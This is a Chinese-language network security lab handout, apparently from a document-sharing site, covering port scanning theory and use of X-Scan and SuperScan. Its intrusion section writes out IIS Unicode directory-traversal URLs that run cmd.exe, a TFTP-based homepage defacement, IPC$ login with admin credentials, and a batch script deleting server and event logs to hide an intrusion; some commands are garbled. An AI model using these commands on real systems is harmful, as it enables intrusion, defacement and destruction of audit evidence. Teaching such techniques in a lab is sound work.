网络安全扫描器与漏洞的入侵扫描Word格式文档下载.docx

上传人:b****2 文档编号:3336288 上传时间:2023-05-01 格式:DOCX 页数:12 大小:434.58KB
下载 相关 举报
网络安全扫描器与漏洞的入侵扫描Word格式文档下载.docx_第1页
第1页 / 共12页
网络安全扫描器与漏洞的入侵扫描Word格式文档下载.docx_第2页
第2页 / 共12页
网络安全扫描器与漏洞的入侵扫描Word格式文档下载.docx_第3页
第3页 / 共12页
网络安全扫描器与漏洞的入侵扫描Word格式文档下载.docx_第4页
第4页 / 共12页
网络安全扫描器与漏洞的入侵扫描Word格式文档下载.docx_第5页
第5页 / 共12页
网络安全扫描器与漏洞的入侵扫描Word格式文档下载.docx_第6页
第6页 / 共12页
网络安全扫描器与漏洞的入侵扫描Word格式文档下载.docx_第7页
第7页 / 共12页
网络安全扫描器与漏洞的入侵扫描Word格式文档下载.docx_第8页
第8页 / 共12页
网络安全扫描器与漏洞的入侵扫描Word格式文档下载.docx_第9页
第9页 / 共12页
网络安全扫描器与漏洞的入侵扫描Word格式文档下载.docx_第10页
第10页 / 共12页
网络安全扫描器与漏洞的入侵扫描Word格式文档下载.docx_第11页
第11页 / 共12页
网络安全扫描器与漏洞的入侵扫描Word格式文档下载.docx_第12页
第12页 / 共12页
亲,该文档总共12页,全部预览完了,如果喜欢就下载吧!
下载资源
资源描述

网络安全扫描器与漏洞的入侵扫描Word格式文档下载.docx

《网络安全扫描器与漏洞的入侵扫描Word格式文档下载.docx》由会员分享,可在线阅读,更多相关《网络安全扫描器与漏洞的入侵扫描Word格式文档下载.docx(12页珍藏版)》请在冰点文库上搜索。

网络安全扫描器与漏洞的入侵扫描Word格式文档下载.docx

一.讲授与示范

正确启动运算机,在最后一个磁盘上成立以学号为名的文件夹,从指定的共享文件夹中将“实习指导书”和其他内容复制到该文件夹中。

(一)安全扫描的原理

1.作用

1)自动检测远程或本地主机安全脆弱点的程序;

2)采用模拟解决的形式对目标可能存在的已知安全漏洞进行逐项检查;

3)并非是一个直接的解决网络漏洞的程序;

2.功能

发觉一个主机和网络的能力;

一旦发觉一台主机,有发觉什么服务正运行在这台主机上的能力;

通过测试这些服务,发觉这些漏洞的能力。

(二)端口扫描

扫描器主要可分为基于主机的和基于网络的两种。

真正的扫描器是TCP端口扫描器,能够连通TCP/IP端口和服务(比如,Telnet或FTP),并记录目标的回答,搜集到关于目标主机的有效信息。

1.TCPSYN扫描

原理:

扫描程序发送的SYN数据包,预备打开一个新的连接并等待反映:

一个SYN|ACK的返回信息表示端口处于侦听状态,一个RST返回表示端口没有处于侦听状态。

长处:

不会在目标运算机上留下纪录。

缺点:

扫描程序必需要有root权限才能成立自己的SYN数据包。

2.TCPconnect()扫描

利用操作系统提供connect()系统挪用,与每一个感兴趣的目标运算机的端口进行连接,若端口处于侦听状态,那么connect()就可以成功。

系统中的任何用户都有权利利用那个挪用;

很容易被发觉,目标运算机的logs文件会显示连续串联接和连接犯错的消息,而且专门快将它关闭。

3.TCPFIN扫描

利用关闭的端口会用适当的RST来回答FIN数据包,而打开的端口会忽略对FIN数据包的回答。

FIN数据包能够不惹任何麻烦的通过。

这种方式和系统的实现有必然的关系,有些系统不论是打开的或关闭的端口对FIN数据包都要给以回答,这种情形下该方式就不实用了。

(三)扫描工具的应用

1.利用X-SCAN扫描局域网主机

1)原理

X-Scan采用多线程方式对指定IP地址段(或单机)进行安全漏洞检测,支持插件功能。

扫描运算机的端口、漏洞、某种服务、某个协议、系统密码,包括:

远程服务类型、操作系统类型及版本,各类弱口令漏洞、后门、应用服务漏洞、网络设备漏洞、拒绝服务漏洞等20多个大类。

对于多数已知漏洞,给出了相应的漏洞描述、解决方案及详细描述链接。

通过扫描结果,能够了解的看到系统哪方面可能出现风险,比如密码太弱或黑客可利用的漏洞等,以便即便采取办法对运算机系统进行加固。

2)X-Scan的利用

任务1 系统弱口令扫描

要求:

利用X-Scan实现主机系统的是不是存在NT弱口令(获取管理权限)

步骤:

1系统安装及设置

下载X-Scan,并解压,运行,而且设置扫描地址

“设置”→“扫描参数”→指定IP范围:

如图1所示:

2设置NT-Server弱口令

全局设置→扫描模块→选择NT-Server等弱口令,如图2所示。

图1

图2

3并发扫描及扫描报告的设置

选择“并发扫描”,能够设置要扫描的最大并发主机数,和最大的并发线程数。

图3

图4

选择‘扫描报告’,点击后会显示在右边的窗格中,它会生成一个检测IP或域名的报告文件,同时报告的文件类型能够有3种选择,别离是HTML、TXT、XML。

4其他设置及端口设置

有2种条件扫描:

1,‘跳过没有响应的主机’,2,‘无条件扫描’,如图5。

设置没有响应的主机:

全局设置→其他设置→选中“跳过没有响应的主机”及其他相关;

端口检测:

插件设置→端口相关设置 → 待检测端口7,9,13,19,21,22,,20...→检测方式:

SYN

图5

图6

‘端口相关设置’中能够自概念一些需要检测的端口。

检测方式“TCP”、“SYN”两种,TCP方式容易被对方发觉,准确性要高一些,SYN则相反。

 

如图6所示。

5SNMP相关设置

用来针对SNMP信息的一些检测设置,在监测主机数量不多的时候能够全选,如图7所示;

 

6NETBIOS相关设置

WINDOWS系统的NETBIOS信息的检测设置,包括的项目有很多种,按照实际需要进行选择,如图8。

图7

图8

7字典文件设置

是X-SCAN自带的一些用于破解远程账号所用的字典文件,这些字典都是简单或系统默许的账号等。

图9

8开始扫描

图10

9扫描进程及扫描结果

扫描结束以后会自动弹出检测报告,包括漏洞的风险级别和详细的信息,以便咱们对对方主机进行详细的分析。

图11

图11

生成扫描报告如图11所示。

不同运算机扫描结果的报告存在不同。

2.superscan工具

1)功能

主要功能:

检测必然范围内目标主机是不是在线和端口开放情形,检测目标主机提供的各类服务,通过Ping命令查验IP是不是在线,进行IP与域名的转换等。

◆通过Ping来查验IP是不是在线;

◆IP和域名彼此转换;

◆查验目标运算机提供的服务类别;

◆查验必然范围目标运算机的是不是在线和端口情形;

◆工具自概念列表查验目标运算机是不是在线和端口情形;

◆自概念要查验的端口,并能够保留为端口列表文件;

◆软件自带一个木马端口列表,通过那个列表咱们能够检测目标运算机是不是有木马;

同时,也能够自己概念修改那个木马端口列表。

2)Superscan应用实例

任务2Superscan应用

运用Superscan选项的设置实现扫描目标主机的各类信息

①Superscan是无需安装,下在解压后能够直接利用。

Superscan12的运行界面如下图所示。

图12Supersca运行界面

②在“开始IP”和“结束IP”:

目标主机IP段,按“开始”:

进行IP扫描,如下图13所示。

图13IP段扫描实例

③选择“主机和服务扫描设置”可对目标主机信息反馈方式、TUP及UDP端口进行设置。

如图14所示。

图14主机和服务扫描设置窗口

④选择“工具”菜单命令,在“主机名/IP/URL”中输入目标主机的主机名、IP地址或域名,然后选择“查找主机名/IP”、“Ping”等图标按钮,能够获取目标主机的各类信息了。

如下图所示。

图15查找主机IP、Ping目标主机等

⑤选择“Windows列举”菜单命令,在“主机名/IP/URL”中输入目标主机的主机名、IP地址或域名,然后选择需要列举的类型,按“Enumerate”按钮,能够获取目标主机的各类列举信息。

如图16所示。

图16对目标主机各类信息进行列举

二.课堂任务实践

任务3 主机入侵方式

多种方式实现对主机的入侵防范

1)IPC$连接的成立与断开

可运用空连接远程目标主机的条件是获到目标主机管理员帐号和密码,同时关闭杀毒软件或防火墙。

①DOS命令窗口

前提:

帐号是admin,密码是123456

netuse\\"

123456"

/user:

"

admin"

   

2f1c2f%c0%2f../windows/system32/?

/c+dir

+c:

\inetpub\wwwroot

目标IP/scripts/..%c1%1c../winnt/system32/?

/c+dir+c:

主页名:

,,,等

◆工具检测:

X-Scan检测该漏洞,通过扫描取得

/script/..%c1%1c../winnt/system32/?

2)上传自制主页

下载Tftpd32工具,运行tftpd32服务器,只需将自制页面复制到tftpd服务器的路径下即可:

格式:

Tftp[-i]host[GET\PUT]soures[destination]

参数:

-i二进制文件传输;

host是Tftp服务器地址;

get指下载文件;

put指上传文件;

Source指文件名;

Destination指目的地。

例:

目标ip地址/scripts/..%c0%2f../windows/system32/?

/c

+tftp+本机ip+get++c:

\inetpub\wwwroot\。

3)从头登录远程主机的网站,即为主页的内容

4.清除入侵信息

入侵者在利用unicode漏洞入侵后,在离开远程服务器前,需要清除服务器的日记文件。

BAT文件:

del+C:

\winnt\system32\logfiles\*.*

\winnt\system32\config\*.evt

\winnt\system32\dtclog\*.*

\winnt\system32\*.log

\winnt\system32\*.txt

\winnt\*.txt

\winnt\*.log

操作:

通过TFTP服务器把BAT文件上传至该服务器C:

\下,再通过unicode漏洞执行该BAT文件。

可是,由于通过unicode漏洞取得的权限很低,对绝大多数服务器,入侵者无法通过该漏洞对system32目录访问。

任务5 远程控制

运用DamWare实现远程控制运算机

见附件“项目35 任务5远程控制”。

三.课堂小结

1.本课的纪律评价。

2.实习操作情形分析及出现的常常利用操作强调。

3.提出要求:

要踊跃参与,仔细理解,增加主动性,才能有所收获。

四.作业

通过上网方式了解网络监听工具Wireshark和Nmap扫描工具的主要功能并能正确利用。

检查:

下次课对本次课的内容进行评价或提问,效果好的在期末成绩上直接2-3分

展开阅读全文
相关资源
猜你喜欢
相关搜索
资源标签

当前位置:首页 > 总结汇报 > 学习总结

copyright@ 2008-2023 冰点文库 网站版权所有

经营许可证编号:鄂ICP备19020893号-2